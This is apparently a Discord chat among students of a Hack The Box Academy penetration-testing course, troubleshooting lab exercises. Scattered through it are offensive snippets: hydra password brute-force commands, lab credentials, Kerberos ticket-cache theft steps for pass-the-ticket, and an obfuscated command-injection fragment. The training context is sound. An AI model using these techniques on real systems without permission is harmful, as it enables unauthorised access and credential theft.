sqsh -S 10.129.180.219 -U mssqlsvc -P 'princess1' -h
sqsh-3.0 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Open Client Message
Layer 6, Origin 8, Severity 5, Number 3
ct_connect(): directory service layer: internal directory control layer error:
Requested server name not found.||

try with -windows-auth for mssqlclient

ok one sec

yup

that was it. Thanks let me add that to my notes

Hi everyone, I'm back. LOL Sorry to bother you, I would like to ask those more expert than me for a suggestion, I'm in the ''attack on common services'' module in particular I can't understand where I'm going wrong, the second question asks me to find the password, I'm using this command: hydra -l marlin@inlanefreight.htb -p /home/kali/Desktop/pws/pws.list -f 10.129.203.12 pop3 , which is the only one that offers the tab, the result it gives me is empty, it gives me the white space without anything, can anyone give me a hint.

don't use the @inlanefreight.htb

just marlin and that's it?

yes

same result

What's wrong in your opinion, Marciel?

idk dude

😢

also

your password list seems awfully small

it looks like it's only one password

meaning that's why it's failing

there are actually 334 words in the pws.list file

well according to the hydra output

there's not

also i believe it's -P for a list

strange

but i could be thinking of the netexec/crackmapexec syntax

that's correct, -P for list

yeah

you're using -p so it's using the line as the password, not the file

you're passing it the literal string /home/kali/Desktop/pws/pws.list is the password

now it's running

hydra -l username -P wordlist.txt -v -s <port> <server> <service>

-l <username> | -L <LIST> ; -p <password> | -P [LIST]

don't use the @inlanefreight.htb

dont work

in this forum it said to use the command as if it were an email, i.e. @inla...htb https://forum.hackthebox.com/t/attacking-common-services-attacking-email-services-smtp/258990/34

unreachable

try respawning the target

now i try

oh wait yeah i was thinking of a different section where you drop the @domain

mb for that

so I have to use the snail, correct?

try

also: try with the pop3s

instead of just pop3

or imap/imaps

the pop3s port appears to be filtered and not open

could just be that protocol is just being dumb

ah ok couldn't recall for that lab

you could also create a user.txt and input both usernames just to rule one out

then use -L instead of -l

but is there something wrong with what I wrote?

so it's saying your execution of the command was successful, but it did not bruteforce the password. so either the username is wrong, or your password list isn't good enough

did you use the pws.list given by the module?

yes

Good evening friends. Lately my RDP is just black when I try and log in. It seems to do it a lot. Then work for no reason, drop not let me back on, etc. Is there something I should be doing to get a more reliable connection?

and which password list can I use? I used the module resources one

what's the md5sum of the pws.list file you're using?

the username is copied and pasted

username should be right

In what sense? I downloaded the file from the site and used it in the script, I didn't change anything

tthis is the user

the username is correct

and i just ran the attack myself

it works

md5sum is just a checksum verification

so that you know the file didn't get corrupted in transfer

in this case what should I do?

this is the md5sum

redownload

my HTB vms are not loading and are buggy

when i click start instance it says i have one open already

sounds like a browser issue

might wanna reach out to support about that

Can I get some help with the Bleichenbacher and DROWN section. Everytime I run the attack it wont work with the pcap file unless I create a ||socat tunnel or use -connect. ||

I redownloaded the file, reused it and it still gives me the same result.

change to a userlist and add just the username (just to make sure) and use a better wordlist.

reset the target

the username@foggy estuary is the right format

again?

also you don't need to specify the port

Now I've done this, and it's taking longer to work

but now i ctrl c

there is something wrong

now i re-spawning the target

don't use a userlist

you have the right username

if it's works for marcie then it's probably a layer 8 issue

nothign, i dont know why it does not work

anyway I'm moving away from the PC for 10 minutes, so it will be inactive for a while

i would recommend going back over the section that taught you this

and make sure you're using the right list as well

the pws list provided is the correct list

oh

OH MY GOD

I just saw it

what is that IP address

check spelling

my spawned target

issue was a layer 8 issue on their end

user@inlanefright.htb

^

nvm

tell me when you see it

it was indeed layer 8 issue

now it works

lol i said that first.. he said he copy/pasted

kudos to me lol+

spooky company

technically the username was correct - the domain was not

the context was -l for hydra, the username flag 😛

yes

but saying wrong username led to some confusion

bc they immediately thought "uh no i have the right user"

i guess i need to make another vm for malware

just download kali; windows flags it as malware

i have completed the moduleeee, amazing

when i tagged u discord have blocked me, lol

.

.

btw thanks to help me

if you tag too many people automod says no

So I am in the Shells & Payloads module in the "Reverse Shells" section and I cannot get the attack box to stay stable enough to do anything. Have tried using pwnbox and my own VM. Assistance would be greatly appreciated!

I didn't know, because I only tagged myself instead I wanted to tag you, good to know

Working on the Command Injections module and it looks like https://github.com/Bashfuscator/Bashfuscator isn't playing nicely with aarch64. Anyone able to recommend an alternative? 🤔

oh you are 1 part ahead of me

fighting through Advanced Command Obfuscation

Did you need help with it?

i ask after 30 mins if i do not get it 🙂

thx for the offer

🙂

Okay. I ran into a bit of trouble with it, but it was a stupid mistake. Make sure you have the command it gives you right 😂

@mild cypress please check dm

you don't really need it for that module iirc

So I am in the Shells & Payloads module in the "Reverse Shells" section and I cannot get the attack box to stay stable enough to do anything. Have tried using pwnbox and my own VM. Assistance would be greatly appreciated!

change vpn regions and respawn the target

wait ~ 5-10 minutes for it to launch fully

login brute force IS THE WORST module

no

lol

yes

hydra is fine and shit

but finding the right wordlists is just pain

and waiting for it to crack is also pain

did you complete the path ?

which path

for example the pentesterpath

nah

but im doing it

still brute force is fucked man

why?

it's pretty easy

annoying but easy , yes

wordlists sucks

i made it almost to the end

so its pretty easy when it comes to progress but at certain time its fucked

they explain it pretty nice

different strengths, different weaknesses

it is explained but for me its fucked

if login brute forcing its fucked, then AD... :))

AD was nice

see

different strengths, different weaknesses

the injection part is heavier for me

and this time limit on the boxes

AD is more complex

it is

you can add more time. 😄

i can´t

I also observed that some times I have the button to add more time, but sometimes no

💀 bro

I hope that in two weeks I will finish CPTS path and I will try to take it.

so you passed command injection already 😉 ?

No. Probably I will start it this weekend.

they teach you everything

and in every task you have to find out some part yourself lol

is it really that hard?

im still at web proxies xd

for me it is

what does it talk about

it talks about command injections

like escaping controls to inject commands?

maybe being more speicifc

it looks kinda like this

||{IFS}${PATH:0:1}usr${PATH:0:1}share${PATH:0:1}${IFS}|${IFS}||

WTF

Use google for solutions. 🙂

the module wasn't too difficult

maybe for you

and thats fine

Different strengths and weaknesses

What are injections, and different types
Identifying code vulnerable to command injections
Different command injection operators we can use
When to use each injection operator, depending on the injection case
Creating a command injection payload
Bypassing front-end input validation and sanitization filters
Identifying back-end filters and security mitigations
Identifying which characters are blacklisted
Different techniques to bypass various blacklisted characters such as spaces, slashes, and semi-colons
Different techniques to bypass various blacklisted commands
Building unique obfuscation methods to bypass blacklisted commands
Using evasion tools to create advanced obfuscated payloads
How to turn vulnerable code to code that is secure against command injections

is source analysis too

at the end

gg i gotta skip that module

if you want tobecome cpts you can´t

running away won't save you

;\

@dim wolf mind for a nudge ?

i have no notes on that module so i'm afraid can't help you

i just need one sign

😄

|||||

https://tenor.com/view/heres-your-sign-duh-no-obviously-well-gif-14071016

funny even it dod not really help 😉

dont listen to marcielee

she doesnt wanna let you go ahead youll get stuck for the rest of your life

that's a skill issue

where are you stuck at

just thug it out

i believe in u

right mindset

i need this || | || obfuscated please

yeah but which section

just don't use it

https://academy.hackthebox.com/module/109/section/1039

yep, don't use it

encode

hmpf

great time is up

thx @next bronze

it worked

too much overthinking :/

Nope, you don't. But I'd still like to play with the tool for learning purposes (or a similar alternative if one exists 🤷 )

install kali ?

Brother I've helped people get further past where I'm at

true and based

I'm using kali 🤔 Not sure what you mean.

didn't you said you're using arch?

Aarch64 (Apple M1) running kali in a VM.

Talking about processors here.

oh arm

Arm64 === Aarch64

Tried it now twice

Try using rdesktop

In my experience rdesktop is a lot more stable than xfreerdp.

rdesktop -u htb-student -p HTB_@cademy_stdnt! <IP>

Well connected quickly, now my entire VM is froze 😂😂

is there a better VM out there for this than VMware? This honestly happens in every module and seems like I'm the only one I talk to that has to keep dealing with crap not working I want to get this stuff done for fsakes.

i use vmware and xfreerdp, never had issues

did you give your vm enough resources?

finally done with the logrotate section. Found a way to make the reverse shell stick! 🙂

(Help) HTTPs/TLS Attacks
Skills Assessment

I was able to retrieve the admin token. When I use it to reedem the admin token, it sends an email. I don't know what to do to retrieve the flag. Any help, please?

what am i doing wrong to prevent the options flag from showing me whats allowed?

Don't use -i?

I had a lot of issues with my Kali as well. I deleted my VM and then setup a new one in VMware and then did a sudo apt upgrade/update and haven’t had any issues for a long time.

And remember to not provide too many cpu cores but plenty of ram.

Well I've done that as well, 16GB of RAM. 2 cores. but finally got it running. I did another sudo apt-upgrade/update. Have a 2,000 dollar ASUS computer from work for this reason lol.

but for this module I turned of the Firewalls, ran the command as administrator and it never works so I went in the control panel and turned off firewalls and keep getting this when I run the payload. Is there something other than I.P you need to change?

Well I don't know how to share the screenshot here

take the screen shot from your host instead of the vm

Wont let me post a file to this server, I have the app open on my host

tried pasting in as well

I’m having issue with this ? + 1 What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

ok skill assesment was kinda "easy" 🙂

enough 4 today -... 6 modules to go

it never really ends

true

attacking common applications - Find another valid user on the target GitLab instance. i found 4 other users and it's not accepting any of them. the scan is still going. this is going to take forever. does anyone have a good userlist? i feel like i'll have to use the 10 million usernames ones and i just want to move on with the module and not sit here for hours while it goes.

wait a few days i´ll catch up 😉

xato is very long

yeah kinda dumb, it's gatekeeping the next part of the module for no reason

the concept is easy, i run the python script and it enumerates from a list of users.. i get it. i can move on, but it won't let me without the answer and it doesn't accept any of the other 4 answers so far.

literal hours to wait for this dumb thing

same like in password module 😄

but in reality its way harder lol

especially when you do a retest and they hardened everything

ok ready for someone to just tell me the answer lol

this thing has been running for an hour now

they should provide a small userlist.txt or something

Hii. I was solving question from introduction to bash Module. Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer. I got the var maching with the value. but when i tried to submit the answer it shows me wrong answer. Any help ?

I'm completely at a loss on Password Attacks Lab - Hard

why -?

I bruteforced johanna's password, which got me access to both smb and rdp, but she doesn't seem to be able to access anything in smb, and the entire module teaches me ways to use rdp as an admin, but she isn't an admin. I can't find anything

NFS exists, but when I enumerated it it showed there wasn't anything to mount, so I'm not sure what that's all about

did you take notes ?

Yes

I have every module I've done so far on gitbook

dm me the notes if you like

Can anyone who has completed Attacking Common Applications help me out?

this module is straight up broken. the app dies after so many enumeration attempts, so you can't get through the whole userlist

I killed my lab trying to brute force rdp lol

yeah i'm pretty sure you're not actually supposed to use the 10 million user list, but the problem is the smaller list turns up nothing (it actually turns up another user "bob" but the answer isn't accepted)

Theres a keepass on the system I think on that one

I found the keepass but I can't find the master pass

Did you get the login from the keepas?

No, it gives you the username Johanna and I brute forced it. Couldn't access anything on smb but RDP works. Found the keepass login app but haven't unlocked it

right so if you have the keepass login and you can rdp, go unlock it 😛

ohh you found the app, but not the keepass file?

No, I mean I found the app to unlock keepass but I don't have the file

I pm'd you

I'm working on cracking the hash for the svc_workstations account before I can ssh login to get the flag for question 5 of the "Pass the Ticket (PtT) from Linux" module. I am using mode 1470 in hashcat to crack the password, I've tried leveraging the mutated password list from the resources and the rockyou list, both are exhausted. Either I'm using the wrong hashcat method or there is a step I'm missing. Any hints?

what does the question ask

if you're passing a hash, you generally aren't cracking a password

"Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory."

the instructions in the material say to crack the hash to obtain the password for that user

and then login with ssh

ill check my notes sec

list: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133

Did you do this part of the module instructions?

can you paste the contents of svc.txt

ah i think for that one you need to find the main ticket

and then you need to impersonate it

with the command silvance gave above 😛

right, pass the pash instead of cracking

noo

ok . I was taking my cue from

pass the ticket :p FILE:/tmp/krb5cc_647402606

the question is a red herring i guess

I'll be honest i looked everywhere for the ticket on that one. But its in the logs of the linikatz

wait, no, that's once you've logged in with the svc account

I'm trying to get the password to login with the svc account

You dont have to login, your impersonating the user with pass the ticket 😛

MODULE: HTTP ATTACKS
SECTION: TE.CL

I'm struggling with the accompanying exercise for this section and could really use some pointers to make sure I'm not fundamentally misunderstanding the attack:

Payload 1:

I'll just try it

root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist

this is pass the ticket

Payload 2:

change the /root/krb5cc with the ticket i gave you

no one here has done the attacking common applications yet?

Make sure you understand the difference though, a passthehash steals the users hash to login. a pass the ticket impersonates them by exporting

so as I suspected, I don't yet have the privileges to access that tmp file

getting permissions denied

right so do a search for all the tickets and try elevate some more 😛

youve got it 😛

your already svc_workstation

doesn't seem to have access rights, I just impersonated the ticket

what are you trying to access?

Just to provide as much info as I can

Hello..I am using the smtp-user-enum script for enumerating users in the Footprinting - SMTP module. The wordlist I used is from the resources. It is just 101 users. However, the script returns to me 0 results. How can it be? I used -M VRFY option

you'll note there are no root krb files, and I don't have sufficient permissions to access any of them

the material has you find kt for carlos, dump the hash, crack the hash, and switch user to carlos, then the next instruction is to reiterate through those steps for svc_workstations

I asked for help in #1024429874246590575 but the post got deleted?

I've found the kt, dumped the hash value, but can't crack, and crackstation doesn't have anything for it

Im sure you impersonate the svc stations hash to get that flag ^